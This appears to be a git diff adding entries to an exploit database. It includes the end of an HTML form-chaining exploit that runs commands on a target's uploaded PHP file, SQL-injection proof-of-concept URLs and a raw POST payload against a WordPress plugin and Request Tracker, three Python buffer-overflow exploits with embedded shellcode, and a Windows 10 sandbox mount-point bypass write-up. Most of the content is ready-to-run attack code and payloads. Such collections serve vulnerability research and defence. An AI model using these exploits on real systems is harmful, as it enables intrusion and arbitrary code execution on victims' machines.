<form name="uploadme" action="javascript:upload();" target="frame1">
</form>
<!-- 3. Code execution -->
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<script>
function exploitrun()
{
document.addext.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.uploadme.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.exploit.submit();
}
}
}
</script>
</body>
</html>

9
platforms/php/webapps/38458.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59021/info
Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Spider Video Player 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]

21
platforms/php/webapps/38459.txt Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/59022/info
Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RT 4.0.10 is vulnerable; other versions may also be affected.
POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120
ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=

41
platforms/windows/local/38456.py Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
# Date: 10/13/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 1.1
# Tested on: XP SP3 EN
# Description: A malicious .aiff file cause this vulnerability.
# category: Local Exploit
f = open("malicious.aiff", "w")
f.write("A"*4132)
f.write("\xeb\x06\x90\x90")
f.write("\xa4\x43\x40\x00")
# Shelcode:
# windows/exec - 277 bytes
# CMD=calc.exe
f.write("\x90"*20)
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
"\xc4\xd9")
f.write("\x90"*20)
f.close()

147
platforms/windows/local/38467.py Executable file
View file

@ -0,0 +1,147 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt
Vendor:
================================
www.adobe.com
Product:
=================================
AdobeWorkgroupHelper.exe v2.8.3.3
Part of Photoshop 7.0 circa 2002
Vulnerability Type:
===========================
Stack Based Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup
functionality, that lets users work with files on a server that is
registered as a workgroup.
If AdobeWorkgroupHelper.exe is called with an overly long command line
argument it is vulnerable to a stack based buffer overflow exploit.
Resluting in arbitrary code execution undermining the integrity of the
program. We can control EIP register at about 5,856 bytes, our shellcode
will point
to ECX register.
Tested successfully on Windows 7 SP1
Exploit code(s):
===============
Use below python script to exploit...
'''
import struct,os,subprocess
#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#------------------------------------
#by hyp3rlinx - apparitionsec@gmail.com
#hyp3rlinx.altervista.org
#==============================================================
#
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===============================================================
'''
Quick Register dump...
EAX 00270938
ECX 00270A7C <---------------BOOM!
EDX 00A515FC ASCII "AAAAAA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 00000000
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
'''
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\Program Files (x86)\Common
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "
#payload="A"*5852+"R"*4 #<---- control EIP register
#our shellcode will point at ECX register, so we need to find an JMP or
CALL ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll
eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3
payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!!
subprocess.Popen([vulnpgm, payload], shell=False)
'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
October 12, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=========================================================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''

118
platforms/windows/local/38472.py Executable file
View file

@ -0,0 +1,118 @@
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt
Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/
Product:
================================
Blat v2.7.6
blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.
Vulnerability Type:
=====================
Stack Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
An older release of blat.exe v2.7.6 is prone to a stack based buffer
overflow when sending
malicious command line arguments, we need to send two arguments first
can be whatever e.g. "AAAA"
then second argument to trigger the buffer overflow and execute
arbitrary code on the victims OS.
Stack dump...
EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141 <-------------- BOOM!
C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
Exploit code(s):
===============
Python script to exploit...
'''
import struct,os,subprocess
#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll
payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)
'''
Disclosure Timeline:
=========================================================
Oct 14, 2015 : Public Disclosure
Severity Level:
=========================================================
Med
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.
by hyp3rlinx
'''

52
platforms/windows/local/38474.txt Executable file
View file

@ -0,0 +1,52 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=486
Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
Class: Security Feature Bypass
Summary:
A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed.
Description:
Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox.
In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:
if (RtlIsSandboxedProcess()) {
if(ControlCode == FSCTL_SET_MOUNT_POINT) {
if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE);
if (!NT_SUCCESS(status)) {
return status;
}
}
}
The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately theres a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the users device mapping.
While the sandboxed process cannot change the per-user drive mappings, it can change the processs device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we dont care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like:
<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)
If we set the unnamed directory to the process device map we can bypass the check and create the mount point.
Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value.
Proof of Concept:
Ive provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable files ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shells mklink tool that will fail to create the mount point at low integrity. The archive password is password. Follow these steps:
1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example:
poc.exe c:\users\user\appdata\local\low\abc c:\notreal.
Expected Result:
It shouldnt be possible to create a mount point pointed at a location not writable by low integrity user
Observed Result:
The mount point is created successfully.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38474.zip